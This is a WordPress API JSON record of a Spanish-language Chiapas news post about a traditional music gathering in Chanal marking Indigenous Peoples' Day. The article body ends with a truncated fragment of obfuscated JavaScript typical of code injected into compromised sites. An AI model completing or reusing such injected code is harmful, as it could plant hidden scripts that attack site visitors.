{"id":4315,"date":"2022-08-12T01:01:22","date_gmt":"2022-08-12T01:01:22","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4315"},"modified":"2022-08-12T01:01:23","modified_gmt":"2022-08-12T01:01:23","slug":"se-promueve-la-cultural-en-chanal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4315","title":{"rendered":"Se promueve la cultural en Chanal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"472\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-11-at-2.06.15-AM-1024x472.jpeg\" alt=\"\" class=\"wp-image-4316\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-11-at-2.06.15-AM-1024x472.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-11-at-2.06.15-AM-300x138.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-11-at-2.06.15-AM-768x354.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-11-at-2.06.15-AM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- En conmemoraci\u00f3n al 9 de agosto, D\u00eda Internacional de las Poblaciones Ind\u00edgenas, se llev\u00f3 a cabo el 1er encuentro de m\u00fasicos provenientes de diversas localidades en el municipio de Chanal, evento que reuni\u00f3 a m\u00e1s de 60 m\u00fasicos de entre 3 a 75 a\u00f1os de edad, lo que permite visualizar que esta manifestaci\u00f3n cultural tendr\u00e1 su permanencia por muchos a\u00f1os m\u00e1s y se logr\u00f3 ver la inclusi\u00f3n de igualdad de g\u00e9nero al tener la participar ni\u00f1as y se\u00f1oras.Entrevistado al respecto, el alcalde Tseltal, Roberto P\u00e9rez Rodr\u00edguez, remarc\u00f3 la importancia de seguir preservando y fortaleciendo la m\u00fasica tradicional como parte de la identidad de Chanal, \u201cen este evento podemos escuchar las melod\u00edas que le dan identidad nuestros municipios, los ritmos, voces que siempre est\u00e1n presentes, los m\u00fasicos son lo que le dan alegr\u00eda cada festividad son parte fundamental\u201d.Se comprometi\u00f3 a seguir impulsando estos tipos de eventos, \u201cno ser\u00e1 el primero, antes que finalice este a\u00f1o tendremos otro concurso de m\u00fasica tradicional, nos coordinaremos con el CELALI, Casa de La Cultura para hacer ruido que Chanal est\u00e1 de pie y es rico culturalmente\u201d. En este sentido, el Antrop\u00f3logo Nicol\u00e1s Huet Bautista Jefe de Departamento de Promoci\u00f3n y Gesti\u00f3n Cultural del Celali, contextualiz\u00f3 la importancia de la m\u00fasica como expresi\u00f3n simb\u00f3lica y filos\u00f3fica de los pueblos ind\u00edgenas, ya que \u201cvisibiliza el conocimiento, los valores de nuestras formas de vida y de pensar del conocimiento milenario de nuestros abuelos\u201d.\u201cHoy rezo nuestro Tatik, pues que significa sus palabras, eso la que estaba pidiendo a nuestro ch\u2019ul osil, ch\u2019ul banamil, como dicen nuestros ancianos anteriormente que el ma\u00edz tiene ch\u2019ulel, el agua tiene ch\u2019ulel, a hora nuestras nuevas generaciones ya no conocen estos conocimientos filos\u00f3ficos, ya se est\u00e1 perdiendo, por eso es bueno visibilizar en el aspecto educativo, en las plazas c\u00edvicas, en espacios abiertos, que no se mueran nuestras lenguas\u201d, pidi\u00f3.Entre los participantes m\u00fasicos y danzantes de los grupos \u201cLa Voz de mi ra\u00edz, seguidores de Rosario, Los conejos de Frontera Mexiquito, Los combinados de Chanal, Grupos de m\u00fasicos tradicional de Chan ja\u2019, Los principales de bien Sacchilbalte\u2019, Ts\u2019unbal jlumaltik y Los originarios de Sacchilbalte\u201d.Cabe mencionar que se premiaron los tres primeros lugares, teniendo como jurado calificador al profesor Martin G\u00f3mez de la localidad el Naranjal, Julio Cesar L\u00f3pez G\u00f3mez y Manuel S\u00e1ntiz G\u00f3mez, ambos del municipio vecino de Oxchuc, adem\u00e1s de Justo Tomas Hern\u00e1ndez Herrera.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas.- En conmemoraci\u00f3n al 9 de agosto, D\u00eda Internacional de las Poblaciones Ind\u00edgenas, se llev\u00f3 a cabo el 1er encuentro de m\u00fasicos provenientes de diversas localidades en el municipio de Chanal, evento que reuni\u00f3 a m\u00e1s de 60 m\u00fasicos de entre 3 a 75 a\u00f1os de edad, lo que &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4316,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-4315","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4315","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4315"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4315\/revisions"}],"predecessor-version":[{"id":4317,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4315\/revisions\/4317"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4316"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4315"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4315"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4315"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}